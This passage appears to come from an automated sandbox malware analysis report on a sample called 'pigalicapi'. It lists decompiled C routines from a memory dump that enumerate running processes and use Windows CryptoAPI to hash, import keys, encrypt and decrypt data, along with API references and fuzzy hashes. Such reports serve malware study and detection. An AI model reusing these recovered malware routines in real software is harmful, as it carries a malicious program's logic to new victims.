                                                                                                                                                                                                                                                                            0x01171db9
                                                                                                                                                                                                                                                                            0x01171dbb
                                                                                                                                                                                                                                                                            0x01171dcb
                                                                                                                                                                                                                                                                            0x01171dcc
                                                                                                                                                                                                                                                                            0x01171dd4
                                                                                                                                                                                                                                                                            0x01171dd5
                                                                                                                                                                                                                                                                            0x01171ddb
                                                                                                                                                                                                                                                                            0x01171ddc
                                                                                                                                                                                                                                                                            0x01171de3
                                                                                                                                                                                                                                                                            0x01171e05
                                                                                                                                                                                                                                                                            0x01171e09
                                                                                                                                                                                                                                                                            0x01171e10
                                                                                                                                                                                                                                                                            0x01171e11
                                                                                                                                                                                                                                                                            0x01171de5
                                                                                                                                                                                                                                                                            0x01171de8
                                                                                                                                                                                                                                                                            0x01171dec
                                                                                                                                                                                                                                                                            0x01171df3
                                                                                                                                                                                                                                                                            0x01171dfa
                                                                                                                                                                                                                                                                            0x01171dfb
                                                                                                                                                                                                                                                                            0x01171dfb
                                                                                                                                                                                                                                                                            0x01171e16
                                                                                                                                                                                                                                                                            0x01171e21
                                                                                                                                                                                                                                                                            0x01171e21
                                                                                                                                                                                                                                                                            0x01171db9
                                                                                                                                                                                                                                                                            0x01171e27
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01171d3e
                                                                                                                                                                                                                                                                            0x01171d18
                                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 01171CB1
                                                                                                                                                                                                                                                                            • Process32First.KERNEL32(000000FF,00000128), ref: 01171CE1
                                                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 01171CEE
                                                                                                                                                                                                                                                                            • Process32Next.KERNEL32 ref: 01171D2E
                                                                                                                                                                                                                                                                            • Process32First.KERNEL32(000000FF,00000128), ref: 01171D52
                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?,000000FF,00000128,000000FF,00000128), ref: 01171D78
                                                                                                                                                                                                                                                                            • lstrcpyA.KERNEL32(-00000204,?), ref: 01171D92
                                                                                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 01171DA6
                                                                                                                                                                                                                                                                            • EnumProcessModules.PSAPI(00000000,?,00000004,00000000), ref: 01171DDC
                                                                                                                                                                                                                                                                            • GetModuleFileNameExA.PSAPI(00000000,?,-00000204,0117575B,00000000,?,00000004,00000000), ref: 01171DFB
                                                                                                                                                                                                                                                                            • GetProcessImageFileNameA.PSAPI(00000000,-00000204,0117575B,00000000,?,00000004,00000000), ref: 01171E11
                                                                                                                                                                                                                                                                            • FindCloseChangeNotification.KERNEL32(00000000,00000000,-00000204,0117575B,00000000,?,00000004,00000000), ref: 01171E21
                                                                                                                                                                                                                                                                            • Process32Next.KERNEL32 ref: 01171E37
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 01171E4B
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1170000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ProcessProcess32$CloseFileFirstNameNext$ChangeCreateCurrentEnumFindHandleImageModuleModulesNotificationOpenSnapshotToolhelp32lstrcpylstrlen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 384183238-0
                                                                                                                                                                                                                                                                            • Opcode ID: 124ed5772dd69252a198f94fe63776e0a2cc5b0868799ba0ebe2d6a5dff944f0
                                                                                                                                                                                                                                                                            • Instruction ID: 96abdcd28f3f74831c5d5674ecbd9ea44996597ed7989b6c9fe88758abfa98ab
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 124ed5772dd69252a198f94fe63776e0a2cc5b0868799ba0ebe2d6a5dff944f0
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A3411175904229ABDB3AEB54DD84BEDB7B9AF48304F0045D8E60CA7284DB30ABC4CF50
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 783 1178bb0-1178bc1 784 1178ce7-1178ced 783->784 785 1178bc7-1178bcb 783->785 785->784 786 1178bd1-1178bd5 785->786 786->784 787 1178bdb-1178bdf 786->787 787->784 788 1178be5-1178c07 CryptAcquireContextA 787->788 789 1178c3e-1178c42 788->789 790 1178c09-1178c19 GetLastError 788->790 789->784 791 1178c48-1178c61 CryptCreateHash 789->791 792 1178c24-1178c38 CryptAcquireContextA 790->792 793 1178c1b-1178c22 790->793 794 1178c63-1178c79 CryptHashData 791->794 795 1178cdb-1178ce1 CryptReleaseContext 791->795 792->789 793->789 793->792 796 1178cd1-1178cd5 CryptDestroyHash 794->796 797 1178c7b-1178ca1 CryptGetHashParam 794->797 795->784 796->795 797->796 798 1178ca3-1178ca9 797->798 798->796 799 1178cab-1178cc9 CryptGetHashParam 798->799 799->796 800 1178ccb-1178cce 799->800 800->796
                                                                                                                                                                                                                                                                            C-Code - Quality: 30%
                                                                                                                                                                                                                                                                            			E01178BB0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
                                                                                                                                                                                                                                                                            				int _v8;
                                                                                                                                                                                                                                                                            				long* _v12;
                                                                                                                                                                                                                                                                            				int _v16;
                                                                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                                                                            				int _v24;
                                                                                                                                                                                                                                                                            				char _v28;
                                                                                                                                                                                                                                                                            				int _v32;
                                                                                                                                                                                                                                                                            				char* _t36;
                                                                                                                                                                                                                                                                            				int _t37;
                                                                                                                                                                                                                                                                            				intOrPtr _t39;
                                                                                                                                                                                                                                                                            				char* _t41;
                                                                                                                                                                                                                                                                            				intOrPtr _t43;
                                                                                                                                                                                                                                                                            				char* _t57;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                                            					L17:
                                                                                                                                                                                                                                                                            					return _v8;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_v12 = 0;
                                                                                                                                                                                                                                                                            					_t36 =  *0x1183370; // 0x117c6e4
                                                                                                                                                                                                                                                                            					_t37 = CryptAcquireContextA( &_v12, _t36, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
                                                                                                                                                                                                                                                                            					if(_t37 == 0) {
                                                                                                                                                                                                                                                                            						_t37 = GetLastError();
                                                                                                                                                                                                                                                                            						_v16 = _t37;
                                                                                                                                                                                                                                                                            						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
                                                                                                                                                                                                                                                                            							_t57 =  *0x1183370; // 0x117c6e4
                                                                                                                                                                                                                                                                            							_t37 = CryptAcquireContextA( &_v12, _t57, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if(_v12 != 0) {
                                                                                                                                                                                                                                                                            						__imp__CryptCreateHash(_v12, 0x8003, 0, 0,  &_v20);
                                                                                                                                                                                                                                                                            						if(_t37 != 0) {
                                                                                                                                                                                                                                                                            							_t39 = _a8;
                                                                                                                                                                                                                                                                            							__imp__CryptHashData(_v20, _a4, _t39, 0);
                                                                                                                                                                                                                                                                            							if(_t39 != 0) {
                                                                                                                                                                                                                                                                            								_v24 = 0;
                                                                                                                                                                                                                                                                            								_v28 = 4;
                                                                                                                                                                                                                                                                            								_t41 =  &_v28;
                                                                                                                                                                                                                                                                            								__imp__CryptGetHashParam(_v20, 4,  &_v24, _t41, 0);
                                                                                                                                                                                                                                                                            								if(_t41 != 0 && _a16 >= _v24) {
                                                                                                                                                                                                                                                                            									_v32 = _a16;
                                                                                                                                                                                                                                                                            									_t43 = _a12;
                                                                                                                                                                                                                                                                            									__imp__CryptGetHashParam(_v20, 2, _t43,  &_v32, 0);
                                                                                                                                                                                                                                                                            									if(_t43 != 0) {
                                                                                                                                                                                                                                                                            										_v8 = _v32;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							__imp__CryptDestroyHash(_v20);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						CryptReleaseContext(_v12, 0);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					goto L17;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}
















                                                                                                                                                                                                                                                                            0x01178bb6
                                                                                                                                                                                                                                                                            0x01178bc1
                                                                                                                                                                                                                                                                            0x01178ce7
                                                                                                                                                                                                                                                                            0x01178ced
                                                                                                                                                                                                                                                                            0x01178be5
                                                                                                                                                                                                                                                                            0x01178be5
                                                                                                                                                                                                                                                                            0x01178bf5
                                                                                                                                                                                                                                                                            0x01178bff
                                                                                                                                                                                                                                                                            0x01178c07
                                                                                                                                                                                                                                                                            0x01178c09
                                                                                                                                                                                                                                                                            0x01178c0f
                                                                                                                                                                                                                                                                            0x01178c19
                                                                                                                                                                                                                                                                            0x01178c2d
                                                                                                                                                                                                                                                                            0x01178c38
                                                                                                                                                                                                                                                                            0x01178c38
                                                                                                                                                                                                                                                                            0x01178c19
                                                                                                                                                                                                                                                                            0x01178c42
                                                                                                                                                                                                                                                                            0x01178c59
                                                                                                                                                                                                                                                                            0x01178c61
                                                                                                                                                                                                                                                                            0x01178c65
                                                                                                                                                                                                                                                                            0x01178c71
                                                                                                                                                                                                                                                                            0x01178c79
                                                                                                                                                                                                                                                                            0x01178c7b
                                                                                                                                                                                                                                                                            0x01178c82
                                                                                                                                                                                                                                                                            0x01178c8b
                                                                                                                                                                                                                                                                            0x01178c99
                                                                                                                                                                                                                                                                            0x01178ca1
                                                                                                                                                                                                                                                                            0x01178cae
                                                                                                                                                                                                                                                                            0x01178cb7
                                                                                                                                                                                                                                                                            0x01178cc1
                                                                                                                                                                                                                                                                            0x01178cc9
                                                                                                                                                                                                                                                                            0x01178cce
                                                                                                                                                                                                                                                                            0x01178cce
                                                                                                                                                                                                                                                                            0x01178cc9
                                                                                                                                                                                                                                                                            0x01178ca1
                                                                                                                                                                                                                                                                            0x01178cd5
                                                                                                                                                                                                                                                                            0x01178cd5
                                                                                                                                                                                                                                                                            0x01178ce1
                                                                                                                                                                                                                                                                            0x01178ce1
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01178c42

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CryptAcquireContextA.ADVAPI32(00000000,0117C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 01178BFF
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 01178C09
                                                                                                                                                                                                                                                                            • CryptAcquireContextA.ADVAPI32(00000000,0117C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 01178C38
                                                                                                                                                                                                                                                                            • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 01178C59
                                                                                                                                                                                                                                                                            • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 01178C71
                                                                                                                                                                                                                                                                            • CryptGetHashParam.ADVAPI32(00000000,00000004,00000000,00000004,00000000), ref: 01178C99
                                                                                                                                                                                                                                                                            • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 01178CC1
                                                                                                                                                                                                                                                                            • CryptDestroyHash.ADVAPI32(00000000), ref: 01178CD5
                                                                                                                                                                                                                                                                            • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 01178CE1
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 01178C28
                                                                                                                                                                                                                                                                            • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 01178BF0
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1170000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Crypt$Hash$Context$AcquireParam$CreateDataDestroyErrorLastRelease
                                                                                                                                                                                                                                                                            • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                                            • API String ID: 731959895-947817771
                                                                                                                                                                                                                                                                            • Opcode ID: de0e346ab504bc451f068aaa4bde693773662a82e33e77c4bd7ad20e2ceeaae4
                                                                                                                                                                                                                                                                            • Instruction ID: 3c726ac140b3537975f8ca9d094382071daddc2c9c4d4c35ddf8d319ef993511
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: de0e346ab504bc451f068aaa4bde693773662a82e33e77c4bd7ad20e2ceeaae4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B4413075A4020AEBEB29CF94D849FEF7BB9BB04700F148519F611A63C0D7B49684CFA0
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E01178A70(BYTE* _a4, DWORD* _a8, BYTE* _a12, int _a16, BYTE* _a20, int _a24) {
                                                                                                                                                                                                                                                                            				int _v8;
                                                                                                                                                                                                                                                                            				long* _v12;
                                                                                                                                                                                                                                                                            				long _v16;
                                                                                                                                                                                                                                                                            				long* _v20;
                                                                                                                                                                                                                                                                            				long* _v24;
                                                                                                                                                                                                                                                                            				char* _t35;
                                                                                                                                                                                                                                                                            				int _t36;
                                                                                                                                                                                                                                                                            				int _t38;
                                                                                                                                                                                                                                                                            				char* _t62;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0 || _a20 == 0 || _a24 == 0) {
                                                                                                                                                                                                                                                                            					L16:
                                                                                                                                                                                                                                                                            					return _v8;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_v12 = 0;
                                                                                                                                                                                                                                                                            					_t35 =  *0x1183370; // 0x117c6e4
                                                                                                                                                                                                                                                                            					_t36 = CryptAcquireContextA( &_v12, _t35, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
                                                                                                                                                                                                                                                                            					if(_t36 == 0) {
                                                                                                                                                                                                                                                                            						_v16 = GetLastError();
                                                                                                                                                                                                                                                                            						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
                                                                                                                                                                                                                                                                            							_t62 =  *0x1183370; // 0x117c6e4
                                                                                                                                                                                                                                                                            							CryptAcquireContextA( &_v12, _t62, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if(_v12 != 0) {
                                                                                                                                                                                                                                                                            						_v20 = 0;
                                                                                                                                                                                                                                                                            						_t38 = CryptImportKey(_v12, _a20, _a24, 0, 1,  &_v20); // executed
                                                                                                                                                                                                                                                                            						if(_t38 != 0) {
                                                                                                                                                                                                                                                                            							_v24 = 0;
                                                                                                                                                                                                                                                                            							if(CryptImportKey(_v12, _a12, _a16, _v20, 1,  &_v24) != 0) {
                                                                                                                                                                                                                                                                            								_v8 = CryptDecrypt(_v24, 0, 1, 0, _a4, _a8);
                                                                                                                                                                                                                                                                            								CryptDestroyKey(_v24);
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							CryptDestroyKey(_v20);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						CryptReleaseContext(_v12, 0);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					goto L16;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                                                            0x01178a76
                                                                                                                                                                                                                                                                            0x01178a81
                                                                                                                                                                                                                                                                            0x01178ba3
                                                                                                                                                                                                                                                                            0x01178ba9
                                                                                                                                                                                                                                                                            0x01178ab9
                                                                                                                                                                                                                                                                            0x01178ab9
                                                                                                                                                                                                                                                                            0x01178ac9
                                                                                                                                                                                                                                                                            0x01178ad3
                                                                                                                                                                                                                                                                            0x01178adb
                                                                                                                                                                                                                                                                            0x01178ae3
                                                                                                                                                                                                                                                                            0x01178aed
                                                                                                                                                                                                                                                                            0x01178b01
                                                                                                                                                                                                                                                                            0x01178b0c
                                                                                                                                                                                                                                                                            0x01178b0c
                                                                                                                                                                                                                                                                            0x01178aed
                                                                                                                                                                                                                                                                            0x01178b16
                                                                                                                                                                                                                                                                            0x01178b1c
                                                                                                                                                                                                                                                                            0x01178b37
                                                                                                                                                                                                                                                                            0x01178b3f
                                                                                                                                                                                                                                                                            0x01178b41
                                                                                                                                                                                                                                                                            0x01178b66
                                                                                                                                                                                                                                                                            0x01178b80
                                                                                                                                                                                                                                                                            0x01178b87
                                                                                                                                                                                                                                                                            0x01178b87
                                                                                                                                                                                                                                                                            0x01178b91
                                                                                                                                                                                                                                                                            0x01178b91
                                                                                                                                                                                                                                                                            0x01178b9d
                                                                                                                                                                                                                                                                            0x01178b9d
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01178b16

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CryptAcquireContextA.ADVAPI32(00000000,0117C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 01178AD3
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 01178ADD
                                                                                                                                                                                                                                                                            • CryptAcquireContextA.ADVAPI32(00000000,0117C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 01178B0C
                                                                                                                                                                                                                                                                            • CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00000000), ref: 01178B37
                                                                                                                                                                                                                                                                            • CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 01178B5E
                                                                                                                                                                                                                                                                            • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 01178B7A
                                                                                                                                                                                                                                                                            • CryptDestroyKey.ADVAPI32(00000000), ref: 01178B87
                                                                                                                                                                                                                                                                            • CryptDestroyKey.ADVAPI32(00000000), ref: 01178B91
                                                                                                                                                                                                                                                                            • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 01178B9D
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 01178AC4
                                                                                                                                                                                                                                                                            • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 01178AFC
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1170000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Crypt$Context$AcquireDestroyImport$DecryptErrorLastRelease
                                                                                                                                                                                                                                                                            • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                                            • API String ID: 1555285084-947817771
                                                                                                                                                                                                                                                                            • Opcode ID: 1d3ecce33e3c6339efe825274b1518640912f13bd14c70b9f4a24a0a23fb82ad
                                                                                                                                                                                                                                                                            • Instruction ID: 3f02f70b606bd9f9c45927200d25e3f9a0ebd1c0f46bfc7c93eabf1e69a58a29
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1d3ecce33e3c6339efe825274b1518640912f13bd14c70b9f4a24a0a23fb82ad
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ED3103B5A00209EBEB29CF98D84DFEF77B9BB48705F148518F611A7380C7B49684CB91
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 011748EB
                                                                                                                                                                                                                                                                            • CryptHashData.ADVAPI32(00000000,?,00000010,00000000), ref: 0117490B
                                                                                                                                                                                                                                                                            • CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 0117493C
                                                                                                                                                                                                                                                                            • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,000002F0), ref: 0117496F
                                                                                                                                                                                                                                                                            • CryptDestroyKey.ADVAPI32(00000000), ref: 01174982
                                                                                                                                                                                                                                                                            • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,?), ref: 011749A9
                                                                                                                                                                                                                                                                            • CryptHashData.ADVAPI32(?,?,000002F0,00000000), ref: 011749CC
                                                                                                                                                                                                                                                                            • CryptGetHashParam.ADVAPI32(?,00000004,00000000,00000004,00000000), ref: 01174A07
                                                                                                                                                                                                                                                                            • CryptGetHashParam.ADVAPI32(?,00000002,?,00000010,00000000), ref: 01174A34
                                                                                                                                                                                                                                                                            • CryptDestroyHash.ADVAPI32(?), ref: 01174A7D
                                                                                                                                                                                                                                                                            • CryptDestroyHash.ADVAPI32(00000000), ref: 01174A8A
                                                                                                                                                                                                                                                                            • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 01174AA5
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1170000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Crypt$Hash$Destroy$CreateDataParam$ContextDecryptDeriveRelease
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2727466597-0
                                                                                                                                                                                                                                                                            • Opcode ID: 627d1c615912beeac7f22cb6b6292bd1a432a312eb57b827f1f100bad551a700
                                                                                                                                                                                                                                                                            • Instruction ID: dc7a7bde59c7ed669f682327671ed999c5c25705cb2010a5826058ab90e08f2a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 627d1c615912beeac7f22cb6b6292bd1a432a312eb57b827f1f100bad551a700
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CA512175A40319ABEB3ADB54DC45FEAB77CAB48B00F0041D8F609A6284DB759B84CF94
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                                                                            			E01178970(intOrPtr _a4, intOrPtr* _a8, BYTE* _a12, int _a16) {
                                                                                                                                                                                                                                                                            				int _v8;
                                                                                                                                                                                                                                                                            				long* _v12;
                                                                                                                                                                                                                                                                            				long _v16;
                                                                                                                                                                                                                                                                            				long* _v20;
                                                                                                                                                                                                                                                                            				char* _t27;
                                                                                                                                                                                                                                                                            				int _t28;
                                                                                                                                                                                                                                                                            				int _t33;
                                                                                                                                                                                                                                                                            				char* _t47;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                                                            					return _v8;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_v12 = 0;
                                                                                                                                                                                                                                                                            					_t27 =  *0x1183370; // 0x117c6e4
                                                                                                                                                                                                                                                                            					_t28 = CryptAcquireContextA( &_v12, _t27, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
                                                                                                                                                                                                                                                                            					if(_t28 == 0) {
                                                                                                                                                                                                                                                                            						_v16 = GetLastError();
                                                                                                                                                                                                                                                                            						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
                                                                                                                                                                                                                                                                            							_t47 =  *0x1183370; // 0x117c6e4
                                                                                                                                                                                                                                                                            							CryptAcquireContextA( &_v12, _t47, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if(_v12 != 0) {
                                                                                                                                                                                                                                                                            						_v20 = 0;
                                                                                                                                                                                                                                                                            						if(CryptImportKey(_v12, _a12, _a16, 0, 1,  &_v20) != 0) {
                                                                                                                                                                                                                                                                            							_t33 = _v20;
                                                                                                                                                                                                                                                                            							__imp__CryptEncrypt(_t33, 0, 1, 0, _a4, _a8,  *_a8);
                                                                                                                                                                                                                                                                            							_v8 = _t33;
                                                                                                                                                                                                                                                                            							CryptDestroyKey(_v20);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						CryptReleaseContext(_v12, 0);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					goto L12;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                                                                            0x01178976
                                                                                                                                                                                                                                                                            0x01178981
                                                                                                                                                                                                                                                                            0x01178a60
                                                                                                                                                                                                                                                                            0x01178a66
                                                                                                                                                                                                                                                                            0x011789a5
                                                                                                                                                                                                                                                                            0x011789a5
                                                                                                                                                                                                                                                                            0x011789b5
                                                                                                                                                                                                                                                                            0x011789bf
                                                                                                                                                                                                                                                                            0x011789c7
                                                                                                                                                                                                                                                                            0x011789cf
                                                                                                                                                                                                                                                                            0x011789d9
                                                                                                                                                                                                                                                                            0x011789ed
                                                                                                                                                                                                                                                                            0x011789f8
                                                                                                                                                                                                                                                                            0x011789f8
                                                                                                                                                                                                                                                                            0x011789d9
                                                                                                                                                                                                                                                                            0x01178a02
                                                                                                                                                                                                                                                                            0x01178a04
                                                                                                                                                                                                                                                                            0x01178a27
                                                                                                                                                                                                                                                                            0x01178a3d
                                                                                                                                                                                                                                                                            0x01178a41
                                                                                                                                                                                                                                                                            0x01178a47
                                                                                                                                                                                                                                                                            0x01178a4e
                                                                                                                                                                                                                                                                            0x01178a4e
                                                                                                                                                                                                                                                                            0x01178a5a
                                                                                                                                                                                                                                                                            0x01178a5a
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01178a02

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CryptAcquireContextA.ADVAPI32(00000000,0117C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 011789BF
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 011789C9
                                                                                                                                                                                                                                                                            • CryptAcquireContextA.ADVAPI32(00000000,0117C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 011789F8
                                                                                                                                                                                                                                                                            • CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 01178A1F
                                                                                                                                                                                                                                                                            • CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 01178A41
                                                                                                                                                                                                                                                                            • CryptDestroyKey.ADVAPI32(00000000), ref: 01178A4E
                                                                                                                                                                                                                                                                            • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 01178A5A
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 011789E8
                                                                                                                                                                                                                                                                            • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 011789B0
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1170000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Crypt$Context$Acquire$DestroyEncryptErrorImportLastRelease
